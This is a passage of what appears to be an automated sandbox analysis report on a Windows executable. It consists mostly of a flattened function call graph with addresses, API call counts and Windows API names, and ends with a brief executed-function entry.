4528bd 118 API calls 87662->87666 87664 40f598 87663->87664 87665 429358 87663->87665 87718 4033c0 113 API calls 7 library calls 87664->87718 87719 434034 86 API calls _wprintf 87665->87719 87667 42934b 87666->87667 87670 429373 87667->87670 87671 42934f 87667->87671 87675 4115d7 52 API calls 87670->87675 87674 431e58 82 API calls 87671->87674 87672 429369 87672->87670 87673 40f5b4 87673->86759 87674->87665 87687 4293c5 moneypunct 87675->87687 87676 42959c 87677 413748 _free 46 API calls 87676->87677 87678 4295a5 87677->87678 87679 431e58 82 API calls 87678->87679 87680 4295b1 87679->87680 87684 401b10 52 API calls 87684->87687 87687->87676 87687->87684 87694 444af8 87687->87694 87697 44b41c 87687->87697 87704 402780 87687->87704 87712 4022d0 87687->87712 87720 44c7dd 64 API calls 3 library calls 87687->87720 87689 410167 _wcslen 87688->87689 87690 4115d7 52 API calls 87689->87690 87691 41017e _wcscpy 87690->87691 87691->87641 87692->87656 87693->87658 87695 4115d7 52 API calls 87694->87695 87696 444b27 _memmove 87695->87696 87696->87687 87698 44b429 87697->87698 87699 4115d7 52 API calls 87698->87699 87700 44b440 87699->87700 87701 44b45e 87700->87701 87702 401b10 52 API calls 87700->87702 87701->87687 87703 44b453 87702->87703 87703->87687 87705 402827 87704->87705 87711 402790 moneypunct _memmove 87704->87711 87707 4115d7 52 API calls 87705->87707 87706 4115d7 52 API calls 87708 402797 87706->87708 87707->87711 87709 4115d7 52 API calls 87708->87709 87710 4027bd 87708->87710 87709->87710 87710->87687 87711->87706 87713 4022e0 87712->87713 87714 40239d 87712->87714 87713->87714 87715 4115d7 52 API calls 87713->87715 87716 402320 moneypunct 87713->87716 87714->87687 87715->87716 87716->87714 87717 4115d7 52 API calls 87716->87717 87717->87716 87718->87673 87719->87672 87720->87687 87722 402539 moneypunct 87721->87722 87723 402417 87721->87723 87722->86767 87723->87722 87724 4115d7 52 API calls 87723->87724 87725 402443 87724->87725 87726 4115d7 52 API calls 87725->87726 87728 4024b4 87726->87728 87728->87722 87729 4022d0 52 API calls 87728->87729 87750 402880 95 API calls 2 library calls 87728->87750 87729->87728 87734 401566 87730->87734 87731 401794 87751 40e9a0 90 API calls 87731->87751 87734->87731 87735 4010a0 52 API calls 87734->87735 87736 40167a 87734->87736 87735->87734 87737 4017c0 87736->87737 87752 45e737 90 API calls 3 library calls 87736->87752 87737->86769 87739 40bc70 52 API calls 87738->87739 87740 40d451 87739->87740 87741 40d50f 87740->87741 87743 40d519 87740->87743 87744 427c01 87740->87744 87745 40e0a0 52 API calls 87740->87745 87747 401b10 52 API calls 87740->87747 87753 40f310 53 API calls 87740->87753 87754 40d860 91 API calls 87740->87754 87755 410600 52 API calls 87741->87755 87743->86772 87756 45e737 90 API calls 3 library calls 87744->87756 87745->87740 87747->87740 87750->87728 87751->87736 87752->87737 87753->87740 87754->87740 87755->87743 87756->87743 87757->86785 87758->86786 87760 42c5fe 87759->87760 87774 4091c6 87759->87774 87761 40bc70 52 API calls 87760->87761 87760->87774 87762 42c64e InterlockedIncrement 87761->87762 87763 42c665 87762->87763 87768 42c697 87762->87768 87765 42c672 InterlockedDecrement Sleep InterlockedIncrement 87763->87765 87763->87768 87764 42c737 InterlockedDecrement 87766 42c74a 87764->87766 87765->87763 87765->87768 87769 408f40 VariantClear 87766->87769 87767 42c731 87767->87764 87768->87764 87768->87767 88043 408e80 VariantClear 87768->88043 87771 42c752 87769->87771 88049 410c60 VariantClear moneypunct 87771->88049 87773 42c6cf 88044 45340c 85 API calls 87773->88044 87774->86813 87776 42c6db 87777 402160 52 API calls 87776->87777 87778 42c6e5 87777->87778 88045 45340c 85 API calls 87778->88045 87780 42c6f1 88046 40d200 52 API calls 2 library calls 87780->88046 87782 42c6fb 88047 465124 53 API calls 87782->88047 87784 42c715 87785 42c76a 87784->87785 87786 42c719 87784->87786 87787 401b10 52 API calls 87785->87787 88048 46fe32 VariantClear 87786->88048 87789 42c77e 87787->87789 87790 401980 53 API calls 87789->87790 87796 42c796 87790->87796 87791 42c812 88051 46fe32 VariantClear 87791->88051 87793 42c82a InterlockedDecrement 88052 46ff07 54 API calls 87793->88052 87795 42c864 88053 45e737 90 API calls 3 library calls 87795->88053 87796->87791 87796->87795 88050 40ba10 52 API calls 2 library calls 87796->88050 87797 42c849 87800 42c9ec 87797->87800 87805 408f40 VariantClear 87797->87805 87810 401980 53 API calls 87797->87810 87813 402780 52 API calls 87797->87813 88055 40a780 87797->88055 88096 47d33e 331 API calls 87800->88096 87802 42c9fe 88097 46feb1 VariantClear VariantClear 87802->88097 87804 42ca08 87806 401b10 52 API calls 87804->87806 87805->87797 87808 42ca15 87806->87808 87807 408f40 VariantClear 87809 42c891 87807->87809 87811 40c2c0 52 API calls 87808->87811 88054 410c60 VariantClear moneypunct 87809->88054 87810->87797 87814 42c874 87811->87814 87813->87797 87814->87807 87816 42ca59 87814->87816 87816->87816 87818 40afc4 87817->87818 87819 40b156 87817->87819 87820 40afd5 87818->87820 87821 42d1e3 87818->87821 88107 45e737 90 API calls 3 library calls 87819->88107 87825 40a780 194 API calls 87820->87825 87842 40b11a moneypunct 87820->87842 88108 45e737 90 API calls 3 library calls 87821->88108 87824 42d1f8 87830 408f40 VariantClear 87824->87830 87828 40b00a 87825->87828 87826 40b143 87826->86813 87828->87824 87831 40b012 87828->87831 87829 42d4db 87829->87829 87830->87826 87832 40b04a 87831->87832 87833 42d231 VariantClear 87831->87833 87834 40b094 moneypunct 87831->87834 87841 40b05c moneypunct 87832->87841 88109 40e270 VariantClear moneypunct 87832->88109 87833->87841 87835 40b108 87834->87835 87837 42d425 moneypunct 87834->87837 87835->87842 88110 40e270 VariantClear moneypunct 87835->88110 87836 42d45a VariantClear 87836->87842 87837->87836 87837->87842 87839 4115d7 52 API calls 87839->87834 87841->87834 87841->87839 87842->87826 88111 45e737 90 API calls 3 library calls 87842->88111 87844 4096c6 _wcslen 87843->87844 87845 40a70c moneypunct _memmove 87844->87845 87846 4115d7 52 API calls 87844->87846 87848 4013a0 52 API calls 87845->87848 87847 4096fa _memmove 87846->87847 87849 4115d7 52 API calls 87847->87849 87850 4297aa 87848->87850 87851 40971b 87849->87851 87853 4115d7 52 API calls 87850->87853 87851->87845 87852 409749 CharUpperBuffW 87851->87852 87856 40976a moneypunct 87851->87856 87852->87856 87854 4297d1 _memmove 87853->87854 88141 45e737 90 API calls 3 library calls 87854->88141 87901 4097e5 moneypunct 87856->87901 88113 47dcbb 196 API calls 87856->88113 87858 408f40 VariantClear 87859 42ae92 87858->87859 88142 410c60 VariantClear moneypunct 87859->88142 87861 42aea4 87862 409aa2 87862->87854 87864 4115d7 52 API calls 87862->87864 87869 409afe 87862->87869 87863 40a689 87866 4115d7 52 API calls 87863->87866 87864->87869 87865 4115d7 52 API calls 87865->87901 87883 40a6af moneypunct _memmove 87866->87883 87867 409b2a 87871 429dbe 87867->87871 87932 409b4d moneypunct _memmove 87867->87932 88121 40b400 VariantClear VariantClear moneypunct 87867->88121 87868 40c2c0 52 API calls 87868->87901 87869->87867 87870 4115d7 52 API calls 87869->87870 87872 429d31 87870->87872 87877 429dd3 87871->87877 88122 40b400 VariantClear VariantClear moneypunct 87871->88122 87876 429d42 87872->87876 88118 44a801 52 API calls 87872->88118 87873 429a46 VariantClear 87873->87901 87874 409fd2 87881 40a045 87874->87881 87930 42a3f5 87874->87930 87887 40e0a0 52 API calls 87876->87887 87877->87932 88123 40e1c0 VariantClear moneypunct 87877->88123 87878 408f40 VariantClear 87878->87901 87885 4115d7 52 API calls 87881->87885 87892 4115d7 52 API calls 87883->87892 87893 40a04c 87885->87893 87888 429d57 87887->87888 88119 453443 52 API calls 87888->88119 87890 42a42f 88128 45e737 90 API calls 3 library calls 87890->88128 87892->87845 87896 40a0a7 87893->87896 87897 4091e0 317 API calls 87893->87897 87894 4299d9 87899 408f40 VariantClear 87894->87899 87914 40a0af 87896->87914 88129 40c790 VariantClear moneypunct 87896->88129 87897->87896 87898 429abd 87898->86813 87902 4299e2 87899->87902 87900 429d88 88120 453443 52 API calls 87900->88120 87901->87854 87901->87862 87901->87863 87901->87865 87901->87868 87901->87873 87901->87878 87901->87883 87901->87894 87901->87898 87907 40a780 194 API calls 87901->87907 87913 42a452 87901->87913 88114 40c4e0 194 API calls 87901->88114 88116 40ba10 52 API calls 2 library calls 87901->88116 88117 40e270 VariantClear moneypunct 87901->88117 88115 410c60 VariantClear moneypunct 87902->88115 87907->87901 87908 402780 52 API calls 87908->87932 87910 4115d7 52 API calls 87910->87932 87912 408f40 VariantClear 87944 40a162 moneypunct _memmove 87912->87944 87913->87858 87915 40a11b 87914->87915 87916 42a4b4 VariantClear 87914->87916 87914->87944 87922 40a12d moneypunct 87915->87922 88130 40e270 VariantClear moneypunct 87915->88130 87916->87922 87917 40a780 194 API calls 87917->87932 87919 401980 53 API calls 87919->87932 87921 4115d7 52 API calls 87921->87944 87922->87921 87922->87944 87925 44a801 52 API calls 87925->87932 87926 42a74d VariantClear 87926->87944 87927 41130a 51 API calls __cinit 87927->87932 87928 40a368 87929 42aad4 87928->87929 87938 40a397 87928->87938 88134 46fe90 VariantClear VariantClear moneypunct 87929->88134 88127 47390f VariantClear 87930->88127 87931 42a7e4 VariantClear 87931->87944 87932->87845 87932->87874 87932->87890 87932->87908 87932->87910 87932->87917 87932->87919 87932->87925 87932->87927 87932->87930 87934 409c95 87932->87934 88124 45f508 52 API calls 87932->88124 88125 403e10 53 API calls 87932->88125 88126 408e80 VariantClear 87932->88126 87933 42a886 VariantClear 87933->87944 87934->86813 87935 40a3ce 87950 40a3d9 moneypunct 87935->87950 88135 40b400 VariantClear VariantClear moneypunct 87935->88135 87937 40e270 VariantClear 87937->87944 87938->87935 87961 40a42c moneypunct 87938->87961 88112 40b400 VariantClear VariantClear moneypunct 87938->88112 87941 4115d7 52 API calls 87941->87944 87942 42abaf 87946 42abd4 VariantClear 87942->87946 87956 40a4ee moneypunct 87942->87956 87943 4115d7 52 API calls 87947 42a5a6 VariantInit VariantCopy 87943->87947 87944->87912 87944->87926 87944->87928 87944->87929 87944->87931 87944->87933 87944->87937 87944->87941 87944->87943 88131 470870 52 API calls 87944->88131 88132 408e80 VariantClear 87944->88132 88133 44ccf1 VariantClear moneypunct 87944->88133 87945 40a4dc 87945->87956 88137 40e270 VariantClear moneypunct 87945->88137 87946->87956 87947->87944 87952 42a5c6 VariantClear 87947->87952 87948 42ac4f 87957 42ac79 VariantClear 87948->87957 87963 40a546 moneypunct 87948->87963 87951 40a41a 87950->87951 87954 42ab44 VariantClear 87950->87954 87950->87961 87951->87961 88136 40e270 VariantClear moneypunct 87951->88136 87952->87944 87953 40a534 87953->87963 88138 40e270 VariantClear moneypunct 87953->88138 87954->87961 87956->87948 87956->87953 87957->87963 87958 42ad28 87964 42ad4e VariantClear 87958->87964 87969 40a583 moneypunct 87958->87969 87960 40a571 87960->87969 88139 40e270 VariantClear moneypunct 87960->88139 87961->87942 87961->87945 87963->87958 87963->87960 87964->87969 87966 40a650 moneypunct 87966->86813 87967 42ae0e VariantClear 87967->87969 87969->87966 87969->87967 88140 40e270 VariantClear moneypunct 87969->88140 87971 408fff 87970->87971 87983 40900d 87970->87983 88143 403ea0 52 API calls __cinit 87971->88143 87974 42c3f6 88147 45e737 90 API calls 3 library calls 87974->88147 87976 4090f2 moneypunct 87976->86813 87977 42c44a 88149 45e737 90 API calls 3 library calls 87977->88149 87978 40a780 194 API calls 87978->87983 87979 42c47b 88150 451b42 61 API calls 87979->88150 87983->87974 87983->87976 87983->87977 87983->87978 87983->87979 87984 42c4cb 87983->87984 87985 42c564 87983->87985 87990 42c548 87983->87990 87992 4090df 87983->87992 87994 42c528 87983->87994 87995 409112 87983->87995 87997 4090ea 87983->87997 88146 4534e3 52 API calls 87983->88146 88148 40c4e0 194 API calls 87983->88148 88152 47faae 233 API calls 87984->88152 87986 408f40 VariantClear 87985->87986 87986->87976 87987 42c491 87987->87976 88151 45e737 90 API calls 3 library calls 87987->88151 87989 42c4da 87989->87976 88153 45e737 90 API calls 3 library calls 87989->88153 88155 45e737 90 API calls 3 library calls 87990->88155 87992->87997 88144 408e80 VariantClear 87992->88144 88154 45e737 90 API calls 3 library calls 87994->88154 87995->87990 88000 40912b 87995->88000 88001 408f40 VariantClear 87997->88001 88000->87976 88145 403e10 53 API calls 88000->88145 88001->87976 88003 40914b 88004 408f40 VariantClear 88003->88004 88004->87976 88156 408d90 88005->88156 88007 429778 88183 410c60 VariantClear moneypunct 88007->88183 88009 429780 88010 408cf9 88010->88007 88011 42976c 88010->88011 88013 408d2d 88010->88013 88182 45e737 90 API calls 3 library calls 88011->88182 88172 403d10 88013->88172 88016 408d71 moneypunct 88016->86813 88017 408f40 VariantClear 88018 408d45 moneypunct 88017->88018 88018->88016 88018->88017 88019->86813 88020->86813 88021->86813 88022->86796 88023->86802 88024->86813 88025->86813 88026->86813 88027->86813 88028->86826 88029->86826 88030->86826 88031->86826 88032->86826 88033->86826 88034->86826 88036 403cdf 88035->88036 88037 408f40 VariantClear 88036->88037 88038 403ce7 88037->88038 88038->86842 88039->86826 88040->86826 88041->86813 88042->86793 88043->87773 88044->87776 88045->87780 88046->87782 88047->87784 88048->87767 88049->87774 88050->87796 88051->87793 88052->87797 88053->87814 88054->87774 88056 40a7a6 88055->88056 88057 40ae8c 88055->88057 88059 4115d7 52 API calls 88056->88059 88098 41130a 51 API calls __cinit 88057->88098 88080 40a7c6 moneypunct _memmove 88059->88080 88060 40a86d 88061 40a878 moneypunct 88060->88061 88072 40abd1 88060->88072 88063 40a884 moneypunct 88061->88063 88069 408f40 VariantClear 88061->88069 88063->87797 88064 401b10 52 API calls 88064->88080 88065 40b5f0 89 API calls 88065->88080 88066 408e80 VariantClear 88066->88080 88067 42b791 VariantClear 88067->88080 88068 42ba2d VariantClear 88068->88080 88069->88061 88070 40e270 VariantClear 88070->88080 88071 42b459 VariantClear 88071->88080 88103 45e737 90 API calls 3 library calls 88072->88103 88073 42bb6a 88106 44b92d VariantClear 88073->88106 88074 40bc10 53 API calls 88074->88080 88075 408cc0 187 API calls 88075->88080 88076 42b6f6 VariantClear 88076->88080 88078 42bc5b 88078->87797 88079 4530c9 VariantClear 88079->88080 88080->88060 88080->88064 88080->88065 88080->88066 88080->88067 88080->88068 88080->88070 88080->88071 88080->88072 88080->88073 88080->88074 88080->88075 88080->88076 88080->88079 88081 4115d7 52 API calls 88080->88081 88082 42bbf5 88080->88082 88084 4115d7 52 API calls 88080->88084 88086 408f40 VariantClear 88080->88086 88091 42bc37 88080->88091 88099 45308a 53 API calls 88080->88099 88100 470870 52 API calls 88080->88100 88101 457f66 87 API calls __write_nolock 88080->88101 88102 472f47 127 API calls 88080->88102 88081->88080 88104 45e737 90 API calls 3 library calls 88082->88104 88087 42b5b3 VariantInit VariantCopy 88084->88087 88086->88080 88087->88080 88089 42b5d7 VariantClear 88087->88089 88089->88080 88105 45e737 90 API calls 3 library calls 88091->88105 88094 42bc48 88094->88073 88095 408f40 VariantClear 88094->88095 88095->88073 88096->87802 88097->87804 88098->88080 88099->88080 88100->88080 88101->88080 88102->88080 88103->88073 88104->88073 88105->88094 88106->88078 88107->87821 88108->87824 88109->87841 88110->87842 88111->87829 88112->87935 88113->87856 88114->87901 88115->87966 88116->87901 88117->87901 88118->87876 88119->87900 88120->87867 88121->87871 88122->87877 88123->87932 88124->87932 88125->87932 88126->87932 88127->87890 88128->87913 88129->87896 88130->87922 88131->87944 88132->87944 88133->87944 88134->87935 88135->87950 88136->87961 88137->87956 88138->87963 88139->87969 88140->87969 88141->87913 88142->87861 88143->87983 88144->87997 88145->88003 88146->87983 88147->87976 88148->87983 88149->87976 88150->87987 88151->87976 88152->87989 88153->87976 88154->87976 88155->87985 88157 4289d2 88156->88157 88158 408db3 88156->88158 88186 45e737 90 API calls 3 library calls 88157->88186 88184 40bec0 90 API calls 88158->88184 88161 408dc9 88162 4289e5 88161->88162 88164 428a05 88161->88164 88167 40a780 194 API calls 88161->88167 88168 408e64 88161->88168 88170 408f40 VariantClear 88161->88170 88171 408e5a 88161->88171 88185 40ba10 52 API calls 2 library calls 88161->88185 88187 45e737 90 API calls 3 library calls 88162->88187 88166 408f40 VariantClear 88164->88166 88166->88171 88167->88161 88169 408f40 VariantClear 88168->88169 88169->88171 88170->88161 88171->88010 88173 408f40 VariantClear 88172->88173 88174 403d20 88173->88174 88175 403cd0 VariantClear 88174->88175 88176 403d4d 88175->88176 88188 467897 88176->88188 88232 4755ad 88176->88232 88235 46e91c 88176->88235 88238 45e17d 88176->88238 88177 403d76 88177->88007 88177->88018 88182->88007 88183->88009 88184->88161 88185->88161 88186->88162 88187->88164 88189 4678bb 88188->88189 88217 467954 88189->88217 88264 45340c 85 API calls 88189->88264 88190 4115d7 52 API calls 88191 467989 88190->88191 88194 467995 88191->88194 88268 40da60 53 API calls 88191->88268 88193 4678f6 88195 413a0e __wsplitpath 46 API calls 88193->88195 88248 4533eb 88194->88248 88198 4678fc 88195->88198 88200 401b10 52 API calls 88198->88200 88202 46790c 88200->88202 88265 40d200 52 API calls 2 library calls 88202->88265 88205 4679c7 GetLastError 88208 403cd0 VariantClear 88205->88208 88206 467a05 88209 467a2c 88206->88209 88210 467a4b 88206->88210 88207 467917 88207->88217 88266 4339fa GetFileAttributesW FindFirstFileW FindClose 88207->88266 88211 4679dc 88208->88211 88213 4115d7 52 API calls 88209->88213 88214 4115d7 52 API calls 88210->88214 88215 4679e6 88211->88215 88269 44ae3e 88211->88269 88219 467a31 88213->88219 88220 467a49 88214->88220 88223 408f40 VariantClear 88215->88223 88216 467928 88216->88217 88222 46792f 88216->88222 88217->88190 88218 467964 88217->88218 88218->88177 88272 436299 52 API calls 2 library calls 88219->88272 88227 408f40 VariantClear 88220->88227 88267 4335cd 56 API calls 3 library calls 88222->88267 88226 4679ed 88223->88226 88226->88177 88229 467a88 88227->88229 88228 467939 88228->88217 88230 408f40 VariantClear 88228->88230 88229->88177 88231 467947 88230->88231 88231->88217 88296 475077 88232->88296 88234 4755c0 88234->88177 88398 46e785 88235->88398 88237 46e92f 88237->88177 88239 45e198 88238->88239 88240 45e19c 88239->88240 88241 45e1b8 88239->88241 88242 408f40 VariantClear 88240->88242 88243 45e1db FindClose 88241->88243 88245 45e1cc 88241->88245 88244 45e1a4 88242->88244 88246 45e1d9 moneypunct 88243->88246 88244->88177 88245->88246 88247 44ae3e CloseHandle 88245->88247 88246->88177 88247->88246 88249 453404 88248->88249 88250 4533f8 88248->88250 88252 40de40 88249->88252 88250->88249 88273 4531b1 85 API calls 5 library calls 88250->88273 88274 40da20 88252->88274 88254 40de4e 88278 40f110 88254->88278 88257 4264fa 88259 40de84 88287 40e080 SetFilePointerEx SetFilePointerEx 88259->88287 88261 40de8b 88288 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88261->88288 88263 40de90 88263->88205 88263->88206 88264->88193 88265->88207 88266->88216 88267->88228 88268->88194 88270 44ae4b moneypunct 88269->88270 88290 443fdf 88269->88290 88270->88215 88272->88220 88273->88249 88275 40da37 88274->88275 88276 40da29 88274->88276 88275->88276 88277 40da3c CloseHandle 88275->88277 88276->88254 88277->88254 88279 40f125 CreateFileW 88278->88279 88280 42630c 88278->88280 88282 40de74 88279->88282 88281 426311 CreateFileW 88280->88281 88280->88282 88281->88282 88283 426337 88281->88283 88282->88257 88286 40dea0 55 API calls moneypunct 88282->88286 88289 40df90 SetFilePointerEx SetFilePointerEx 88283->88289 88285 426342 88285->88282 88286->88259 88287->88261 88288->88263 88289->88285 88291 40da20 CloseHandle 88290->88291 88292 443feb 88291->88292 88295 4340db CloseHandle moneypunct 88292->88295 88294 444001 88294->88270 88295->88294 88297 4533eb 85 API calls 88296->88297 88298 4750b8 88297->88298 88299 4750ee 88298->88299 88300 475129 88298->88300 88302 408f40 VariantClear 88299->88302 88349 4646e0 88300->88349 88306 4750f5 88302->88306 88303 47515e 88304 475162 88303->88304 88312 47518e 88303->88312 88305 408f40 VariantClear 88304->88305 88325 475169 88305->88325 88306->88234 88307 475365 88383 44b3ac 57 API calls 88307->88383 88308 4754ea 88390 464812 92 API calls 88308->88390 88315 4533eb 85 API calls 88312->88315 88324 475480 88312->88324 88334 475357 88312->88334 88336 4754b5 88312->88336 88381 436299 52 API calls 2 library calls 88312->88381 88382 463ad5 64 API calls __wcsicoll 88312->88382 88313 4754fc 88314 475374 88313->88314 88316 475508 88313->88316 88362 430d31 88314->88362 88315->88312 88317 408f40 VariantClear 88316->88317 88321 47550f 88317->88321 88319 475388 88369 4577e9 88319->88369 88321->88325 88323 47539e 88377 410cfc 88323->88377 88327 408f40 VariantClear 88324->88327 88325->88234 88327->88325 88329 4753d4 88385 40e830 53 API calls 88329->88385 88330 4753b8 88384 45e737 90 API calls 3 library calls 88330->88384 88333 4753c5 GetCurrentProcess TerminateProcess 88333->88329 88334->88307 88334->88308 88335 4753e3 88347 475406 88335->88347 88386 40cf00 53 API calls 88335->88386 88337 408f40 VariantClear 88336->88337 88337->88325 88338 475556 88338->88325 88343 47556e FreeLibrary 88338->88343 88340 4753f8 88387 46c43e 106 API calls 2 library calls 88340->88387 88343->88325 88347->88338 88348 408f40 VariantClear 88347->88348 88388 40cf00 53 API calls 88347->88388 88389 408e80 VariantClear 88347->88389 88391 44b3ac 57 API calls 88347->88391 88392 46c43e 106 API calls 2 library calls 88347->88392 88348->88347 88393 4536f7 53 API calls 88349->88393 88351 4646fc 88394 4426cd 59 API calls _wcslen 88351->88394 88353 464711 88355 40bc70 52 API calls 88353->88355 88361 46474b 88353->88361 88356 46472c 88355->88356 88395 461465 52 API calls _memmove 88356->88395 88358 464741 88360 40c600 52 API calls 88358->88360 88359 464793 88359->88303 88360->88361 88361->88359 88396 463ad5 64 API calls __wcsicoll 88361->88396 88363 430db2 88362->88363 88364 430d54 88362->88364 88363->88319 88365 4115d7 52 API calls 88364->88365 88368 430d74 88365->88368 88366 430da9 88366->88319 88367 4115d7 52 API calls 88367->88368 88368->88366 88368->88367 88370 457a84 88369->88370 88376 45780c _strcat moneypunct _wcslen _wcscpy 88369->88376 88370->88323 88371 45340c 85 API calls 88371->88376 88372 443006 57 API calls 88372->88376 88374 4135bb 46 API calls _malloc 88374->88376 88375 40f6f0 54 API calls 88375->88376 88376->88370 88376->88371 88376->88372 88376->88374 88376->88375 88397 44b3ac 57 API calls 88376->88397 88378 410d11 88377->88378 88379 410da9 VirtualProtect 88378->88379 88380 410d77 88378->88380 88379->88380 88380->88329 88380->88330 88381->88312 88382->88312 88383->88314 88384->88333 88385->88335 88386->88340 88387->88347 88388->88347 88389->88347 88390->88313 88391->88347 88392->88347 88393->88351 88394->88353 88395->88358 88396->88359 88397->88376 88399 46e7a2 88398->88399 88400 4115d7 52 API calls 88399->88400 88403 46e802 88399->88403 88401 46e7ad 88400->88401 88402 46e7b9 88401->88402 88446 40da60 53 API calls 88401->88446 88408 4533eb 85 API calls 88402->88408 88404 46e7e5 88403->88404 88411 46e82f 88403->88411 88405 408f40 VariantClear 88404->88405 88407 46e7ea 88405->88407 88407->88237 88409 46e7ca 88408->88409 88412 40de40 60 API calls 88409->88412 88410 46e8b5 88439 4680ed 88410->88439 88411->88410 88415 46e845 88411->88415 88413 46e7d7 88412->88413 88413->88411 88417 46e7db 88413->88417 88416 4533eb 85 API calls 88415->88416 88424 46e84b 88416->88424 88417->88404 88420 44ae3e CloseHandle 88417->88420 88418 46e8bb 88443 443fbe 88418->88443 88419 46e87a 88447 4689f4 59 API calls 88419->88447 88420->88404 88421 46e883 88425 4013c0 52 API calls 88421->88425 88424->88419 88424->88421 88427 46e88f 88425->88427 88428 40e0a0 52 API calls 88427->88428 88430 46e899 88428->88430 88429 408f40 VariantClear 88437 46e881 88429->88437 88448 40d200 52 API calls 2 library calls 88430->88448 88432 46e911 88432->88237 88433 46e8a5 88449 4689f4 59 API calls 88433->88449 88434 40da20 CloseHandle 88436 46e903 88434->88436 88438 44ae3e CloseHandle 88436->88438 88437->88432 88437->88434 88438->88432 88440 4680fa 88439->88440 88442 468100 88439->88442 88450 467ac4 55 API calls 2 library calls 88440->88450 88442->88418 88451 443e36 88443->88451 88445 443fd3 88445->88429 88445->88437 88446->88402 88447->88437 88448->88433 88449->88437 88450->88442 88454 443e19 88451->88454 88455 443e26 88454->88455 88456 443e32 WriteFile 88454->88456 88457 443db4 SetFilePointerEx SetFilePointerEx 88455->88457 88456->88445 88457->88456 88458 42d154 88462 480a8d 88458->88462 88460 42d161 88461 480a8d 194 API calls 88460->88461 88461->88460 88463 480ae4 88462->88463 88464 480b26 88462->88464 88466 480aeb 88463->88466 88467 480b15 88463->88467 88465 40bc70 52 API calls 88464->88465 88486 480b2e 88465->88486 88469 480aee 88466->88469 88470 480b04 88466->88470 88495 4805bf 194 API calls 88467->88495 88469->88464 88471 480af3 88469->88471 88494 47fea2 194 API calls __itow_s 88470->88494 88493 47f135 194 API calls 88471->88493 88474 40e0a0 52 API calls 88474->88486 88476 408f40 VariantClear 88478 481156 88476->88478 88477 480aff 88477->88476 88479 408f40 VariantClear 88478->88479 88480 48115e 88479->88480 88480->88460 88481 401980 53 API calls 88481->88486 88483 40c2c0 52 API calls 88483->88486 88484 40e710 53 API calls 88484->88486 88485 40a780 194 API calls 88485->88486 88486->88474 88486->88477 88486->88481 88486->88483 88486->88484 88486->88485 88488 480ff5 88486->88488 88489 408e80 VariantClear 88486->88489 88496 45377f 52 API calls 88486->88496 88497 45e951 53 API calls 88486->88497 88498 40e830 53 API calls 88486->88498 88499 47925f 53 API calls 88486->88499 88500 47fcff 194 API calls 88486->88500 88501 45e737 90 API calls 3 library calls 88488->88501 88489->88486 88493->88477 88494->88477 88495->88477 88496->88486 88497->88486 88498->88486 88499->88486 88500->88486 88501->88477 88502 425b2b 88507 40f000 88502->88507 88506 425b3a 88508 4115d7 52 API calls 88507->88508 88509 40f007 88508->88509 88510 4276ea 88509->88510 88516 40f030 88509->88516 88515 41130a 51 API calls __cinit 88515->88506 88517 40f039 88516->88517 88518 40f01a 88516->88518 88546 41130a 51 API calls __cinit 88517->88546 88520 40e500 88518->88520 88521 40bc70 52 API calls 88520->88521 88522 40e515 GetVersionExW 88521->88522 88523 402160 52 API calls 88522->88523 88524 40e557 88523->88524 88547 40e660 88524->88547 88530 427674 88534 4276c6 GetSystemInfo 88530->88534 88532 40e5e0 88535 4276d5 GetSystemInfo 88532->88535 88561 40efd0 88532->88561 88533 40e5cd GetCurrentProcess 88568 40ef20 LoadLibraryA GetProcAddress 88533->88568 88534->88535 88539 40e629 88565 40ef90 88539->88565 88542 40e641 FreeLibrary 88543 40e644 88542->88543 88544 40e653 FreeLibrary 88543->88544 88545 40e656 88543->88545 88544->88545 88545->88515 88546->88518 88548 40e667 88547->88548 88549 42761d 88548->88549 88550 40c600 52 API calls 88548->88550 88551 40e55c 88550->88551 88552 40e680 88551->88552 88553 40e687 88552->88553 88554 427616 88553->88554 88555 40c600 52 API calls 88553->88555 88556 40e566 88555->88556 88556->88530 88557 40ef60 88556->88557 88558 40e5c8 88557->88558 88559 40ef66 LoadLibraryA 88557->88559 88558->88532 88558->88533 88559->88558 88560 40ef77 GetProcAddress 88559->88560 88560->88558 88562 40e620 88561->88562 88563 40efd6 LoadLibraryA 88561->88563 88562->88534 88562->88539 88563->88562 88564 40efe7 GetProcAddress 88563->88564 88564->88562 88569 40efb0 LoadLibraryA GetProcAddress 88565->88569 88567 40e632 GetNativeSystemInfo 88567->88542 88567->88543 88568->88532 88569->88567 88570 425b5e 88575 40c7f0 88570->88575 88574 425b6d 88610 40db10 52 API calls 88575->88610 88577 40c82a 88611 410ab0 6 API calls 88577->88611 88579 40c86d 88580 40bc70 52 API calls 88579->88580 88581 40c877 88580->88581 88582 40bc70 52 API calls 88581->88582 88583 40c881 88582->88583 88584 40bc70 52 API calls 88583->88584 88585 40c88b 88584->88585 88586 40bc70 52 API calls 88585->88586 88587 40c8d1 88586->88587 88588 40bc70 52 API calls 88587->88588 88589 40c991 88588->88589 88612 40d2c0 52 API calls 88589->88612 88591 40c99b 88613 40d0d0 53 API calls 88591->88613 88593 40c9c1 88594 40bc70 52 API calls 88593->88594 88595 40c9cb 88594->88595 88614 40e310 53 API calls 88595->88614 88597 40ca28 88598 408f40 VariantClear 88597->88598 88599 40ca30 88598->88599 88600 408f40 VariantClear 88599->88600 88601 40ca38 GetStdHandle 88600->88601 88602 429630 88601->88602 88603 40ca87 88601->88603 88602->88603 88604 429639 88602->88604 88609 41130a 51 API calls __cinit 88603->88609 88615 4432c0 57 API calls 88604->88615 88606 429641 88616 44b6ab CreateThread 88606->88616 88608 42964f CloseHandle 88608->88603 88609->88574 88610->88577 88611->88579 88612->88591 88613->88593 88614->88597 88615->88606 88616->88608 88617 44b5cb 58 API calls 88616->88617 88618 425b6f 88623 40dc90 88618->88623 88622 425b7e 88624 40bc70 52 API calls 88623->88624 88625 40dd03 88624->88625 88632 40f210 88625->88632 88627 426a97 88629 40dd96 88629->88627 88630 40ddb7 88629->88630 88635 40dc00 52 API calls 2 library calls 88629->88635 88631 41130a 51 API calls __cinit 88630->88631 88631->88622 88636 40f250 RegOpenKeyExW 88632->88636 88634 40f230 88634->88629 88635->88629 88637 425e17 88636->88637 88638 40f275 RegQueryValueExW 88636->88638 88637->88634 88639 40f2c3 RegCloseKey 88638->88639 88640 40f298 88638->88640 88639->88634 88641 40f2a9 RegCloseKey 88640->88641 88642 425e1d 88640->88642 88641->88634

                                                            Executed Functions

                                                            Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 004096C1
